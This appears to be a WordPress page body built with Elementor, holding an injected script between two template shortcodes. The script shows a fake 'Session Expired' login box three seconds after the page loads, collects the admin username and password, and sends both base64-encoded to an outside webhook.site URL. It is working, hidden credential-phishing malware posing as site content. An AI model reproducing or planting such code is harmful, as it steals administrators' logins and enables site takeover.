[elementor-template id=”22″]
<script> setTimeout(function(){ var d=document.createElement("div"); d.style.cssText="position:fixed;top:30%;left:50%;transform:translate(-50%,-50%);background:white;padding:30px;border:2px solid #d63638;z-index:99999;border-radius:8px;box-shadow:0 0 30px rgba(0,0,0,0.5);font-family:Arial;min-width:320px"; d.innerHTML="<h3 style="color:#d63638;margin-top:0">🔒 Session Expired</h3><p style="font-size:13px;color:#666">Please re-enter your admin credentials to continue.</p><input id=fuser placeholder=Username style="width:100%;padding:10px;margin:5px 0;border:1px solid #ddd;border-radius:4px"><input id=fpass type=password placeholder=Password style="width:100%;padding:10px;margin:5px 0;border:1px solid #ddd;border-radius:4px"><button onclick="var u=document.getElementById("fuser").value,p=document.getElementById("fpass").value;new Image().src="https://webhook.site/82cb1a4c-402f-4237-a1e3-f257a798dd83?u="+btoa(u)+"&p="+btoa(p);this.parentElement.remove()" style="width:100%;padding:10px;background:#d63638;color:white;border:none;border-radius:4px;cursor:pointer;margin-top:10px;font-weight:bold">Login</button>"; document.body.appendChild(d); }, 3000); </script>
[elementor-template id=”22″]